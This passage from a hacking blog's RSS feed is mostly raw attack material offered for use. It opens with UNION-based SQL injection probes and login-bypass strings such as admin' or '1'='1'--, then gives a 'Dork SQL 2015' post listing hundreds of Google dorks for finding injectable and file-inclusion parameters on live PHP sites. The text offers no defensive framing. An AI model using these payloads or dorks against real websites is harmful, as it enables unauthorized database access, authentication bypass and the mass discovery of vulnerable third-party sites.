 UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(106)+CHAR(99)+CHAR(73)+CHAR(66)+CHAR(109)+CHAR(119)+CHAR(81)+CHAR(108)+CHAR(88)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113),NULL-- &#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX'&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX'-- &#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2-- &#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3-- &#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4-- &#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5-- &#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6-- &#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7-- &#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8-- &#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9-- &#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10-- &#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11-- &#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12-- &#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13-- &#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14-- &#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15-- &#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- &#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- &#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- &#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- &#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- &#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- &#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- &#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- &#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- &#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- &#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- &#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- &#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- &#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- &#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- &#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX'#&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2#&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3#&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4#&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5#&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6#&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7#&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8#&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9#&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10#&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11#&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12#&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13#&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14#&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15#&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#&#13;
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#</pre>
<h2 id="ftoc-cac-payload-sql-injection-bypass" class="ftwp-heading">The Payload SQL Injection Bypass</h2>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">'-'&#13;
' '&#13;
'&amp;'&#13;
'^'&#13;
'*'&#13;
' or ''-'&#13;
' or '' '&#13;
' or ''&amp;'&#13;
' or ''^'&#13;
' or ''*'&#13;
"-"&#13;
" "&#13;
"&amp;"&#13;
"^"&#13;
"*"&#13;
" or ""-"&#13;
" or "" "&#13;
" or ""&amp;"&#13;
" or ""^"&#13;
" or ""*"&#13;
or true--&#13;
" or true--&#13;
' or true--&#13;
") or true--&#13;
') or true--&#13;
' or 'x'='x&#13;
') or ('x')=('x&#13;
')) or (('x'))=(('x&#13;
" or "x"="x&#13;
") or ("x")=("x&#13;
")) or (("x"))=(("x&#13;
or 1=1&#13;
or 1=1--&#13;
or 1=1#&#13;
or 1=1/*&#13;
admin' --&#13;
admin' #&#13;
admin'/*&#13;
admin' or '1'='1&#13;
admin' or '1'='1'--&#13;
admin' or '1'='1'#&#13;
admin' or '1'='1'/*&#13;
admin'or 1=1 or ''='&#13;
admin' or 1=1&#13;
admin' or 1=1--&#13;
admin' or 1=1#&#13;
admin' or 1=1/*&#13;
admin') or ('1'='1&#13;
admin') or ('1'='1'--&#13;
admin') or ('1'='1'#&#13;
admin') or ('1'='1'/*&#13;
admin') or '1'='1&#13;
admin') or '1'='1'--&#13;
admin') or '1'='1'#&#13;
admin') or '1'='1'/*&#13;
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055&#13;
admin" --&#13;
admin" #&#13;
admin"/*&#13;
admin" or "1"="1&#13;
admin" or "1"="1"--&#13;
admin" or "1"="1"#&#13;
admin" or "1"="1"/*&#13;
admin"or 1=1 or ""="&#13;
admin" or 1=1&#13;
admin" or 1=1--&#13;
admin" or 1=1#&#13;
admin" or 1=1/*&#13;
admin") or ("1"="1&#13;
admin") or ("1"="1"--&#13;
admin") or ("1"="1"#&#13;
admin") or ("1"="1"/*&#13;
admin") or "1"="1&#13;
admin") or "1"="1"--&#13;
admin") or "1"="1"#&#13;
admin") or "1"="1"/*&#13;
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055</pre>
</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;42530&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;0&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;0&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 0\/5 - (0 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;title&quot;:&quot;Danh s\u00e1ch Payload SQL Injection&quot;,&quot;width&quot;:&quot;0&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>
            <span class="kksr-muted">Rate this post</span>
    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/sql-injection-payload-list/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2022/07/1_zB5JlbMSA26pklzNRAmSEg.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>Dork SQL 2015 &#8211; AnonyViet</title>
		<link>https://en.anonyviet.com/dork-sql-2015-anonyviet/</link>
					<comments>https://en.anonyviet.com/dork-sql-2015-anonyviet/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Wed, 01 Feb 2023 02:51:39 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[AnonyViet]]></category>
		<category><![CDATA[Dork]]></category>
		<category><![CDATA[SQL]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=7696</guid>

					<description><![CDATA[List dork sql injection 2015 Join the channel Telegram of the AnonyViet 👉 Link 👈 trainers.php?id=&#13; article.php?ID=&#13; play_old.php?id=&#13; declaration_more.php?decl_id=&#13; Pageid=&#13; games.php?id=&#13; newsDetail.php?id=&#13; staff_id=&#13; historialeer.php?num=&#13; product-item.php?id=&#13; news_view.php?id=&#13; humor.php?id=&#13; communique_detail.php?id=&#13; sem.php3?id=&#13; opinions.php?id=&#13; spr.php?id=&#13; pages.php?id=&#13; chappies.php?id=&#13; prod_detail.php?id=&#13; viewphoto.php?id=&#13; view.php?id=&#13; website.php?id=&#13; hosting_info.php?id=&#13; gery.php?id=&#13; detail.php?ID=&#13; publications.php?id=&#13; Productinfo.php?id=&#13; releases.php?id=&#13; ray.php?id=&#13; produit.php?id=&#13; pop.php?id=&#13; shopping.php?id=&#13; productdetail.php?id=&#13; post.php?id=&#13; section.php?id=&#13; theme.php?id=&#13; page.php?id=&#13; shredder-categories.php?id=&#13; product_ranges_view.php?ID=&#13; shop_category.php?id=&#13; [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div>
<p>List dork sql injection 2015</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<pre class="minimize:true lang:default decode:true">trainers.php?id=&#13;
article.php?ID=&#13;
play_old.php?id=&#13;
declaration_more.php?decl_id=&#13;
Pageid=&#13;
games.php?id=&#13;
newsDetail.php?id=&#13;
staff_id=&#13;
historialeer.php?num=&#13;
product-item.php?id=&#13;
news_view.php?id=&#13;
humor.php?id=&#13;
communique_detail.php?id=&#13;
sem.php3?id=&#13;
opinions.php?id=&#13;
spr.php?id=&#13;
pages.php?id=&#13;
chappies.php?id=&#13;
prod_detail.php?id=&#13;
viewphoto.php?id=&#13;
view.php?id=&#13;
website.php?id=&#13;
hosting_info.php?id=&#13;
gery.php?id=&#13;
detail.php?ID=&#13;
publications.php?id=&#13;
Productinfo.php?id=&#13;
releases.php?id=&#13;
ray.php?id=&#13;
produit.php?id=&#13;
pop.php?id=&#13;
shopping.php?id=&#13;
productdetail.php?id=&#13;
post.php?id=&#13;
section.php?id=&#13;
theme.php?id=&#13;
page.php?id=&#13;
shredder-categories.php?id=&#13;
product_ranges_view.php?ID=&#13;
shop_category.php?id=&#13;
channel_id=&#13;
newsid=&#13;
news_display.php?getid=&#13;
ages.php?id=&#13;
clanek.php4?id=&#13;
review.php?id=&#13;
iniziativa.php?in=&#13;
curriculum.php?id=&#13;
labels.php?id=&#13;
look.php?ID=&#13;
galeri_info.php?l=&#13;
tekst.php?idt=&#13;
newscat.php?id=&#13;
newsticker_info.php?idn=&#13;
rubrika.php?idr=&#13;
offer.php?idf=&#13;
"id=" &amp; intext:"Warning: mysql_fetch_array()&#13;
"id=" &amp; intext:"Warning: getimagesize()&#13;
"id=" &amp; intext:"Warning: session_start()&#13;
"id=" &amp; intext:"Warning: mysql_num_rows()&#13;
"id=" &amp; intext:"Warning: mysql_query()&#13;
"id=" &amp; intext:"Warning: array_merge()&#13;
"id=" &amp; intext:"Warning: preg_match()&#13;
"id=" &amp; intext:"Warning: ilesize()&#13;
"id=" &amp; intext:"Warning: filesize()&#13;
index.php?id=&#13;
buy.php?category=&#13;
article.php?ID=&#13;
play_old.php?id=&#13;
newsitem.php?num=&#13;
top10.php?cat=&#13;
historialeer.php?num=&#13;
reagir.php?num=&#13;
Stray-Questions-View.php?num=&#13;
forum_bds.php?num=&#13;
game.php?id=&#13;
view_product.php?id=&#13;
sw_comment.php?id=&#13;
news.php?id=&#13;
avd_start.php?avd=&#13;
event.php?id=&#13;
sql.php?id=&#13;
news_view.php?id=&#13;
select_biblio.php?id=&#13;
humor.php?id=&#13;
ogl_inet.php?ogl_id=&#13;
fiche_spectacle.php?id=&#13;
communique_detail.php?id=&#13;
sem.php3?id=&#13;
kategorie.php4?id=&#13;
faq2.php?id=&#13;
show_an.php?id=&#13;
preview.php?id=&#13;
loadpsb.php?id=&#13;
opinions.php?id=&#13;
spr.php?id=&#13;
announce.php?id=&#13;
participant.php?id=&#13;
download.php?id=&#13;
main.php?id=&#13;
review.php?id=&#13;
chappies.php?id=&#13;
read.php?id=&#13;
prod_detail.php?id=&#13;
article.php?id=&#13;
person.php?id=&#13;
productinfo.php?id=&#13;
showimg.php?id=&#13;
view.php?id=&#13;
website.php?id=&#13;
hosting_info.php?id=&#13;
gery.php?id=&#13;
rub.php?idr=&#13;
view_faq.php?id=&#13;
artikelinfo.php?id=&#13;
detail.php?ID=&#13;
index.php?=&#13;
profile_view.php?id=&#13;
category.php?id=&#13;
publications.php?id=&#13;
fellows.php?id=&#13;
downloads_info.php?id=&#13;
prod_info.php?id=&#13;
shop.php?do=part&amp;id=&#13;
collectionitem.php?id=&#13;
band_info.php?id=&#13;
product.php?id=&#13;
releases.php?id=&#13;
ray.php?id=&#13;
produit.php?id=&#13;
pop.php?id=&#13;
shopping.php?id=&#13;
productdetail.php?id=&#13;
post.php?id=&#13;
viewshowdetail.php?id=&#13;
clubpage.php?id=&#13;
memberInfo.php?id=&#13;
section.php?id=&#13;
theme.php?id=&#13;
page.php?id=&#13;
shredder-categories.php?id=&#13;
tradeCategory.php?id=&#13;
product_ranges_view.php?ID=&#13;
shop_category.php?id=&#13;
transcript.php?id=&#13;
channel_id=&#13;
item_id=&#13;
newsid=&#13;
trainers.php?id=&#13;
news-full.php?id=&#13;
news_display.php?getid=&#13;
index2.php?option=&#13;
readnews.php?id=&#13;
newsone.php?id=&#13;
product-item.php?id=&#13;
pages.php?id=&#13;
clanek.php4?id=&#13;
viewapp.php?id=&#13;
viewphoto.php?id=&#13;
galeri_info.php?l=&#13;
iniziativa.php?in=&#13;
curriculum.php?id=&#13;
labels.php?id=&#13;
story.php?id=&#13;
look.php?ID=&#13;
aboutbook.php?id=&#13;
"id=" &amp; intext:"Warning: mysql_fetch_assoc()&#13;
"id=" &amp; intext:"Warning: is_writable()&#13;
"id=" &amp; intext:"Warning: Unknown()&#13;
"id=" &amp; intext:"Warning: mysql_result()&#13;
"id=" &amp; intext:"Warning: pg_exec()&#13;
"id=" &amp; intext:"Warning: require()&#13;
buy.php?category=&#13;
pageid=&#13;
page.php?file=&#13;
show.php?id=&#13;
newsitem.php?num=&#13;
readnews.php?id=&#13;
top10.php?cat=&#13;
reagir.php?num=&#13;
Stray-Questions-View.php?num=&#13;
forum_bds.php?num=&#13;
game.php?id=&#13;
view_product.php?id=&#13;
sw_comment.php?id=&#13;
news.php?id=&#13;
avd_start.php?avd=&#13;
event.php?id=&#13;
sql.php?id=&#13;
select_biblio.php?id=&#13;
ogl_inet.php?ogl_id=&#13;
fiche_spectacle.php?id=&#13;
kategorie.php4?id=&#13;
faq2.php?id=&#13;
show_an.php?id=&#13;
loadpsb.php?id=&#13;
announce.php?id=&#13;
participant.php?id=&#13;
download.php?id=&#13;
article.php?id=&#13;
person.php?id=&#13;
productinfo.php?id=&#13;
showimg.php?id=&#13;
rub.php?idr=&#13;
view_faq.php?id=&#13;
artikelinfo.php?id=&#13;
index.php?=&#13;
profile_view.php?id=&#13;
category.php?id=&#13;
fellows.php?id=&#13;
downloads_info.php?id=&#13;
prod_info.php?id=&#13;
shop.php?do=part&amp;id=&#13;
collectionitem.php?id=&#13;
band_info.php?id=&#13;
product.php?id=&#13;
viewshowdetail.php?id=&#13;
clubpage.php?id=&#13;
memberInfo.php?id=&#13;
tradeCategory.php?id=&#13;
transcript.php?id=&#13;
item_id=&#13;
news-full.php?id=&#13;
aboutbook.php?id=&#13;
preview.php?id=&#13;
material.php?id=&#13;
read.php?id=&#13;
viewapp.php?id=&#13;
story.php?id=&#13;
newsone.php?id=&#13;
rubp.php?idr=&#13;
art.php?idm=&#13;
title.php?id=&#13;
index1.php?modo=&#13;
include.php?*[*]*=&#13;
nota.php?pollname=&#13;
index3.php?p=&#13;
padrao.php?pre=&#13;
home.php?pa=&#13;
main.php?type=&#13;
sitio.php?start=&#13;
*.php?include=&#13;
general.php?xlink=&#13;
show.php?go=&#13;
nota.php?ki=&#13;
down*.php?oldal=&#13;
layout.php?disp=&#13;
enter.php?chapter=&#13;
base.php?incl=&#13;
enter.php?mod=&#13;
show.php?corpo=&#13;
head.php?*[*]*=&#13;
info.php?strona=&#13;
template.php?str=&#13;
main.php?doshow=&#13;
view.php?*[*]*=&#13;
index.php?to=&#13;
page.php?cmd=&#13;
view.php?b=&#13;
info.php?option=&#13;
show.php?x=&#13;
template.php?texto=&#13;
index3.php?ir=&#13;
print.php?chapter=&#13;
file.php?inc=&#13;
file.php?cont=&#13;
view.php?cmd=&#13;
include.php?chapter=&#13;
path.php?my=&#13;
principal.php?param=&#13;
general.php?menue=&#13;
index1.php?b=&#13;
info.php?chapter=&#13;
nota.php?chapter=&#13;
general.php?include=&#13;
start.php?addr=&#13;
index1.php?qry=&#13;
index1.php?loc=&#13;
page.php?addr=&#13;
index1.php?dir=&#13;
principal.php?pr=&#13;
press.php?seite=&#13;
head.php?cmd=&#13;
home.php?sec=&#13;
home.php?category=&#13;
standard.php?cmd=&#13;
mod*.php?thispage=&#13;
base.php?to=&#13;
view.php?choix=&#13;
base.php?panel=&#13;
template.php?mod=&#13;
info.php?j=&#13;
blank.php?pref=&#13;
sub*.php?channel=&#13;
standard.php?in=&#13;
general.php?cmd=&#13;
pagina.php?panel=&#13;
template.php?where=&#13;
path.php?channel=&#13;
gery.php?seccion=&#13;
page.php?tipo=&#13;
sitio.php?rub=&#13;
pagina.php?u=&#13;
file.php?ir=&#13;
*inc*.php?sivu=&#13;
path.php?start=&#13;
page.php?chapter=&#13;
home.php?recipe=&#13;
enter.php?pname=&#13;
layout.php?path=&#13;
print.php?open=&#13;
mod*.php?channel=&#13;
down*.php?phpbb_root_path=&#13;
*inc*.php?str=&#13;
gery.php?phpbb_root_path=&#13;
include.php?middlePart=&#13;
sub*.php?destino=&#13;
info.php?read=&#13;
home.php?sp=&#13;
main.php?strona=&#13;
sitio.php?get=&#13;
sitio.php?index=&#13;
index3.php?option=&#13;
enter.php?a=&#13;
main.php?second=&#13;
print.php?pname=&#13;
blank.php?itemnav=&#13;
blank.php?pagina=&#13;
index1.php?d=&#13;
down*.php?where=&#13;
*inc*.php?include=&#13;
path.php?pre=&#13;
home.php?loader=&#13;
start.php?eval=&#13;
index.php?disp=&#13;
head.php?mod=&#13;
sitio.php?section=&#13;
nota.php?doshow=&#13;
home.php?seite=&#13;
home.php?a=&#13;
page.php?url=&#13;
pagina.php?left=&#13;
layout.php?c=&#13;
principal.php?goto=&#13;
standard.php?base_dir=&#13;
home.php?where=&#13;
page.php?sivu=&#13;
*inc*.php?adresa=&#13;
padrao.php?str=&#13;
include.php?my=&#13;
show.php?home=&#13;
index.php?load=&#13;
index3.php?rub=&#13;
sub*.php?str=&#13;
start.php?index=&#13;
nota.php?mod=&#13;
sub*.php?mid=&#13;
index1.php?*[*]*=&#13;
pagina.php?oldal=&#13;
padrao.php?loc=&#13;
padrao.php?rub=&#13;
page.php?incl=&#13;
gery.php?disp=&#13;
nota.php?oldal=&#13;
include.php?u=&#13;
principal.php?pagina=&#13;
print.php?choix=&#13;
head.php?filepath=&#13;
include.php?corpo=&#13;
sub*.php?action=&#13;
head.php?pname=&#13;
press.php?dir=&#13;
show.php?xlink=&#13;
file.php?left=&#13;
nota.php?destino=&#13;
general.php?module=&#13;
index3.php?redirect=&#13;
down*.php?param=&#13;
default.php?ki=&#13;
padrao.php?h=&#13;
padrao.php?read=&#13;
mod*.php?cont=&#13;
index1.php?l=&#13;
down*.php?pr=&#13;
gery.php?viewpage=&#13;
template.php?load=&#13;
nota.php?pr=&#13;
padrao.php?destino=&#13;
index2.php?channel=&#13;
principal.php?opcion=&#13;
start.php?str=&#13;
press.php?*[*]*=&#13;
index.php?ev=&#13;
pagina.php?pre=&#13;
nota.php?content=&#13;
include.php?adresa=&#13;
sitio.php?t=&#13;
index.php?sivu=&#13;
principal.php?q=&#13;
path.php?ev=&#13;
print.php?module=&#13;
index.php?loc=&#13;
nota.php?basepath=&#13;
padrao.php?tipo=&#13;
index2.php?in=&#13;
principal.php?eval=&#13;
file.php?qry=&#13;
info.php?t=&#13;
enter.php?play=&#13;
general.php?var=&#13;
principal.php?s=&#13;
standard.php?pagina=&#13;
standard.php?subject=&#13;
base.php?second=&#13;
head.php?inc=&#13;
pagina.php?basepath=&#13;
main.php?pname=&#13;
*inc*.php?modo=&#13;
include.php?goto=&#13;
file.php?pg=&#13;
head.php?g=&#13;
general.php?header=&#13;
start.php?*root*=&#13;
enter.php?pref=&#13;
index3.php?open=&#13;
start.php?module=&#13;
main.php?load=&#13;
enter.php?pg=&#13;
padrao.php?redirect=&#13;
pagina.php?my=&#13;
gery.php?pre=&#13;
enter.php?w=&#13;
info.php?texto=&#13;
enter.php?open=&#13;
base.php?rub=&#13;
gery.php?*[*]*=&#13;
include.php?cmd=&#13;
standard.php?dir=&#13;
layout.php?page=&#13;
index3.php?pageweb=&#13;
include.php?numero=&#13;
path.php?destino=&#13;
index3.php?home=&#13;
default.php?seite=&#13;
path.php?eval=&#13;
base.php?choix=&#13;
template.php?cont=&#13;
info.php?pagina=&#13;
default.php?x=&#13;
default.php?option=&#13;
gery.php?ki=&#13;
down*.php?second=&#13;
blank.php?path=&#13;
pagina.php?v=&#13;
file.php?pollname=&#13;
index3.php?var=&#13;
layout.php?goto=&#13;
pagina.php?incl=&#13;
home.php?action=&#13;
include.php?oldal=&#13;
print.php?left=&#13;
print.php?u=&#13;
nota.php?v=&#13;
home.php?str=&#13;
press.php?panel=&#13;
page.php?mod=&#13;
default.php?param=&#13;
down*.php?texto=&#13;
mod*.php?dir=&#13;
view.php?where=&#13;
blank.php?subject=&#13;
path.php?play=&#13;
base.php?l=&#13;
index2.php?rub=&#13;
general.php?opcion=&#13;
layout.php?xlink=&#13;
padrao.php?name=&#13;
pagina.php?nivel=&#13;
default.php?oldal=&#13;
template.php?k=&#13;
